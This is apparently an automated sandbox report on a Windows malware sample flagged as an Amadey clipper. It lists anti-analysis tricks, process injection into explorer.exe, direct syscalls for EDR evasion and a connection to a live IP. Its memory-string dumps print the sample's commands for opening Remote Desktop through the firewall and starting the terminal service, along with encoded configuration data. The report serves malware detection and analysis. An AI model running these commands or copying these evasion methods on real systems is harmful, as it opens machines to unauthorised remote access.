            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeAPI/Special instruction interceptor: Address: 759E7C44
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeAPI/Special instruction interceptor: Address: 759E7945
            Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 759E3B54
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: C1A317
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3238Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 6612Jump to behavior
            Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlhiojbrJump to dropped file
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2956Thread sleep count: 3238 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2956Thread sleep time: -97140000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3792Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2956Thread sleep count: 6612 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2956Thread sleep time: -198360000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0323F271 FindFirstFileExW,10_2_0323F271
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032093D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,10_2_032093D0
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000Jump to behavior
            Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
            Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
            Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
            Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
            Source: explorer.exe, 0000000A.00000002.3893734835.0000000003347000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3893734835.00000000033A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
            Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
            Source: explorer.exe, 0000000A.00000002.3893734835.00000000033A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0322A4A5
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeCode function: 0_2_0076ADA5 mov eax, dword ptr fs:[00000030h]0_2_0076ADA5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032362F2 mov eax, dword ptr fs:[00000030h]10_2_032362F2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322DE60 mov eax, dword ptr fs:[00000030h]10_2_0322DE60
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032407F2 GetProcessHeap,10_2_032407F2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322A608 SetUnhandledExceptionFilter,10_2_0322A608
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0322A4A5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322EE6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0322EE6D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_03229BB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_03229BB8

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 62.60.226.15 80Jump to behavior
            Contains functionality to inject code into remote processes
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_03208070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,10_2_03208070
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeNtProtectVirtualMemory: Direct from: 0x6D6C2D37Jump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeNtQuerySystemInformation: Direct from: 0x59C2C1Jump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeNtSetInformationThread: Direct from: 0x76BA46Jump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\SysWOW64\more.comMemory written: PID: 2972 base: C179C0 value: 55Jump to behavior
            Source: C:\Windows\SysWOW64\more.comMemory written: PID: 2972 base: 303A008 value: 00Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: C179C0Jump to behavior
            Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: 303A008Jump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322A68F cpuid 10_2_0322A68F
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,10_2_03242321
            Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,10_2_032423C8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_03242126
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,10_2_0324278C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_03242539
            Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,10_2_03242413
            Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,10_2_032424AE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,10_2_032384BC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_03242A87
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,10_2_032429B8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,10_2_032389DE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_032428B2
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7964f6ae VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\Windows\SysWOW64\explorer.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322A8B5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_0322A8B5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,10_2_032061F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0323E98E _free,_free,_free,GetTimeZoneInformation,_free,10_2_0323E98E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032091B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,10_2_032091B0

            Stealing of Sensitive Information

            barindex
            Yara detected Amadeys Clipper DLL
            Source: Yara matchFile source: 2.2.more.com.5cd00c8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.explorer.exe.3200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.more.com.5cd00c8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nlhiojbr, type: DROPPED

            Remote Access Functionality

            barindex
            Contains functionality to start a terminal service
            Source: more.com, 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
            Source: more.com, 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskuseren promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta1bf8674ebe6a09a1462faf683ebc12220c6f4a26c13cb3c260c246fe6c1910d8a680cabf38d1c12e9ccb11d8a341579568f43N JzKewnQkMXL9C1Lpir8eMXQntfOH7p2fMcjC r8zE=NI5CJv==Uo1q9CQmJI2xaL==LIWxaL==Z N VOJcRUMrN6==RTi5aSRmPnZZZF==UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8RfZvVSWaZG==UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8OPlxdw0pZNKhSSJegjFOavTs2vwxg2CfWPNAUTSm iNUgB==UcWyYS2pFx5wMGNIRtjSyv4qQ3JbUQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8RfZvcdWzWBtlQAMbUxKAWYFafYQ=UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8OPlxdw0pZNKhRXdefHAbRb7sPzQphw==JLWYOQFJYlcBSJvFzJ==XuGB v==Uu YSv==RQWZaMRaddNacSRabTNaYclaYNJacwNadM5aZw1aYNZabxZabSdac 1=YTKqWx1dfHB3YRvp3v0bgGC3YTKqWx1dfHA=YSyu x1dfHA=ZtF=ZJF=ZJJ=ZJN=TMGu9b==axS5 ykoPx==axS5 CIZPzb=ZNiqZwyxYS2pcxNCbNOuecmBLTG68RRTPwN+PwR+LRCxaR ifoQqKotwIm==fq==JdWz8SM2PG==cSiq9BssQj9fbvu=aSWD9hRlQAMpZvvsRSW5QhBTeY3gUSjz4zQkXW h9o==UxKAWYFafVVcdvDcQL0GRWM Y3chdwbh3fP=QN0u hA=SSGE BRrg3x0ItvhO ==RLOKSv==UwGzWBA Y3ZedMHp4Af=Rw oaB5rMGhgY6==QL0MMpZBSB5T2XBOZLL13fgRjQ==Qcm5WBRf3X9fZMG=Tc DaB5nUS B8B5sQS y9XNoVSmzOBRf3X9fZMG=MtFDJuMURkgZOF==ccJ=dSJ=QS zaBRnhD5PeMzlEbwkiWCV8PFiedHmZc D9NXd2YVcOnzi2WQl4GKtbL4uNIRkLI1yINWmDGqI9X1T3X9VLJPp3Wwmh2qV8OcvQ9sdbTKyIRNahHI2Iv3h2PP0NmWcayIjQosdaMyq9hBm3U4dI71PNX5nhHZpdrZU5QwcTiGc zFtcME9dwmA9d5o24VgdrZz4AEc3W5Iz94LDGpyINWmPT4=LI1Szb==PTOo eWqLcqBWr==QS zaBRnhD5PeMzlEbw9hHGn8ORifwcmb9 9IS Whz5hbSHtBQQpgG0pVUcl1MH=URmYSzRG1FRWccHl2gMug2 V ectWSMRXuOA9iNrf3B8QR7t3AQR4XOJVO5mZuEmbNC6aBRrXnJoZF==QS y CRT3YNJYLZlYMKoWBRf33lkabrs2P0mhHKt VV2fd5VeNpBJOEsREYXNoe5BO3=LNWz8RJo3HYoURmYSzRG1FRWccHl2gMug2 V ectWSMRXuOA9iNrf3B8VL3p4zQb0mqfWOcdSQ0FVvKUQAtPWVVATQu=URmYSzRG1FRqbcPy2VsK4XVrJvJdWSMpdcmoWSJ6UnJuaLLE1QIngGK0Ux3q1wMmVcmpWR5CVB==XtBBJyw=RwWrVSRlhGRgdwPp2f9qQlmNWPRwdxMRaM zRwWrVSRlhGRgdwPp2f9qQlqNWPRwdxMRaM zUQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTNlQgN6U4ZtcbTu4yUchnSk9U8=UxKAWCRchF9cbLS=M BCLL==M BDJb==M BCKb==M BDKL==QTWD hRnhFNWaLvkXq==O pacdWzWBtlQAMpZMflLStlIdSm XpkeXBnIr7myv4ggSFdI9BrGdxTeX5gbST0ywz8Oi3bWyZtKq==J9ZlOSdihDM=I9BrGdxr3X8bIsZrFv==Uw 8WSFseHZnbr3l5zP=LMW9WRJUhHpqbczv2zgajSGtWO5wfwMqaMezWRM PV3kbvSgy ==I7==cSi6aBNoh38bLMKgBQL8RA==cTRd r==ccGzWB5mSSW Vh5agnUbTvD52WQR2FGtWOBw0MH=MtBBJywTQUo=MtBBJywTQkM=MtBBJywTQkQ=MtBBJywTQ32=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
            Source: explorer.exeString found in binary or memory: net start termservice
            Source: explorer.exe, 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: net start termservice
            Source: explorer.exe, 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskuseren promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta1bf8674ebe6a09a1462faf683ebc12220c6f4a26c13cb3c260c246fe6c1910d8a680cabf38d1c12e9ccb11d8a341579568f43N JzKewnQkMXL9C1Lpir8eMXQntfOH7p2fMcjC r8zE=NI5CJv==Uo1q9CQmJI2xaL==LIWxaL==Z N VOJcRUMrN6==RTi5aSRmPnZZZF==UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8RfZvVSWaZG==UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8OPlxdw0pZNKhSSJegjFOavTs2vwxg2CfWPNAUTSm iNUgB==UcWyYS2pFx5wMGNIRtjSyv4qQ3JbUQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8RfZvcdWzWBtlQAMbUxKAWYFafYQ=UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8OPlxdw0pZNKhRXdefHAbRb7sPzQphw==JLWYOQFJYlcBSJvFzJ==XuGB v==Uu YSv==RQWZaMRaddNacSRabTNaYclaYNJacwNadM5aZw1aYNZabxZabSdac 1=YTKqWx1dfHB3YRvp3v0bgGC3YTKqWx1dfHA=YSyu x1dfHA=ZtF=ZJF=ZJJ=ZJN=TMGu9b==axS5 ykoPx==axS5 CIZPzb=ZNiqZwyxYS2pcxNCbNOuecmBLTG68RRTPwN+PwR+LRCxaR ifoQqKotwIm==fq==JdWz8SM2PG==cSiq9BssQj9fbvu=aSWD9hRlQAMpZvvsRSW5QhBTeY3gUSjz4zQkXW h9o==UxKAWYFafVVcdvDcQL0GRWM Y3chdwbh3fP=QN0u hA=SSGE BRrg3x0ItvhO ==RLOKSv==UwGzWBA Y3ZedMHp4Af=Rw oaB5rMGhgY6==QL0MMpZBSB5T2XBOZLL13fgRjQ==Qcm5WBRf3X9fZMG=Tc DaB5nUS B8B5sQS y9XNoVSmzOBRf3X9fZMG=MtFDJuMURkgZOF==ccJ=dSJ=QS zaBRnhD5PeMzlEbwkiWCV8PFiedHmZc D9NXd2YVcOnzi2WQl4GKtbL4uNIRkLI1yINWmDGqI9X1T3X9VLJPp3Wwmh2qV8OcvQ9sdbTKyIRNahHI2Iv3h2PP0NmWcayIjQosdaMyq9hBm3U4dI71PNX5nhHZpdrZU5QwcTiGc zFtcME9dwmA9d5o24VgdrZz4AEc3W5Iz94LDGpyINWmPT4=LI1Szb==PTOo eWqLcqBWr==QS zaBRnhD5PeMzlEbw9hHGn8ORifwcmb9 9IS Whz5hbSHtBQQpgG0pVUcl1MH=URmYSzRG1FRWccHl2gMug2 V ectWSMRXuOA9iNrf3B8QR7t3AQR4XOJVO5mZuEmbNC6aBRrXnJoZF==QS y CRT3YNJYLZlYMKoWBRf33lkabrs2P0mhHKt VV2fd5VeNpBJOEsREYXNoe5BO3=LNWz8RJo3HYoURmYSzRG1FRWccHl2gMug2 V ectWSMRXuOA9iNrf3B8VL3p4zQb0mqfWOcdSQ0FVvKUQAtPWVVATQu=URmYSzRG1FRqbcPy2VsK4XVrJvJdWSMpdcmoWSJ6UnJuaLLE1QIngGK0Ux3q1wMmVcmpWR5CVB==XtBBJyw=RwWrVSRlhGRgdwPp2f9qQlmNWPRwdxMRaM zRwWrVSRlhGRgdwPp2f9qQlqNWPRwdxMRaM zUQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTNlQgN6U4ZtcbTu4yUchnSk9U8=UxKAWCRchF9cbLS=M BCLL==M BDJb==M BCKb==M BDKL==QTWD hRnhFNWaLvkXq==O pacdWzWBtlQAMpZMflLStlIdSm XpkeXBnIr7myv4ggSFdI9BrGdxTeX5gbST0ywz8Oi3bWyZtKq==J9ZlOSdihDM=I9BrGdxr3X8bIsZrFv==Uw 8WSFseHZnbr3l5zP=LMW9WRJUhHpqbczv2zgajSGtWO5wfwMqaMezWRM PV3kbvSgy ==I7==cSi6aBNoh38bLMKgBQL8RA==cTRd r==ccGzWB5mSSW Vh5agnUbTvD52WQR2FGtWOBw0MH=MtBBJywTQUo=MtBBJywTQkM=MtBBJywTQkQ=MtBBJywTQ32=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
            Source: nlhiojbr.2.drString found in binary or memory: net start termservice
            Source: nlhiojbr.2.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskuseren promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta1bf8674ebe6a09a1462faf683ebc12220c6f4a26c13cb3c260c246fe6c1910d8a680cabf38d1c12e9ccb11d8a341579568f43N JzKewnQkMXL9C1Lpir8eMXQntfOH7p2fMcjC r8zE=NI5CJv==Uo1q9CQmJI2xaL==LIWxaL==Z N VOJcRUMrN6==RTi5aSRmPnZZZF==UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8RfZvVSWaZG==UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8OPlxdw0pZNKhSSJegjFOavTs2vwxg2CfWPNAUTSm iNUgB==UcWyYS2pFx5wMGNIRtjSyv4qQ3JbUQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8RfZvcdWzWBtlQAMbUxKAWYFafYQ=UQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTOhNYRrgnZpduXl3gIgg2 8OPlxdw0pZNKhRXdefHAbRb7sPzQphw==JLWYOQFJYlcBSJvFzJ==XuGB v==Uu YSv==RQWZaMRaddNacSRabTNaYclaYNJacwNadM5aZw1aYNZabxZabSdac 1=YTKqWx1dfHB3YRvp3v0bgGC3YTKqWx1dfHA=YSyu x1dfHA=ZtF=ZJF=ZJJ=ZJN=TMGu9b==axS5 ykoPx==axS5 CIZPzb=ZNiqZwyxYS2pcxNCbNOuecmBLTG68RRTPwN+PwR+LRCxaR ifoQqKotwIm==fq==JdWz8SM2PG==cSiq9BssQj9fbvu=aSWD9hRlQAMpZvvsRSW5QhBTeY3gUSjz4zQkXW h9o==UxKAWYFafVVcdvDcQL0GRWM Y3chdwbh3fP=QN0u hA=SSGE BRrg3x0ItvhO ==RLOKSv==UwGzWBA Y3ZedMHp4Af=Rw oaB5rMGhgY6==QL0MMpZBSB5T2XBOZLL13fgRjQ==Qcm5WBRf3X9fZMG=Tc DaB5nUS B8B5sQS y9XNoVSmzOBRf3X9fZMG=MtFDJuMURkgZOF==ccJ=dSJ=QS zaBRnhD5PeMzlEbwkiWCV8PFiedHmZc D9NXd2YVcOnzi2WQl4GKtbL4uNIRkLI1yINWmDGqI9X1T3X9VLJPp3Wwmh2qV8OcvQ9sdbTKyIRNahHI2Iv3h2PP0NmWcayIjQosdaMyq9hBm3U4dI71PNX5nhHZpdrZU5QwcTiGc zFtcME9dwmA9d5o24VgdrZz4AEc3W5Iz94LDGpyINWmPT4=LI1Szb==PTOo eWqLcqBWr==QS zaBRnhD5PeMzlEbw9hHGn8ORifwcmb9 9IS Whz5hbSHtBQQpgG0pVUcl1MH=URmYSzRG1FRWccHl2gMug2 V ectWSMRXuOA9iNrf3B8QR7t3AQR4XOJVO5mZuEmbNC6aBRrXnJoZF==QS y CRT3YNJYLZlYMKoWBRf33lkabrs2P0mhHKt VV2fd5VeNpBJOEsREYXNoe5BO3=LNWz8RJo3HYoURmYSzRG1FRWccHl2gMug2 V 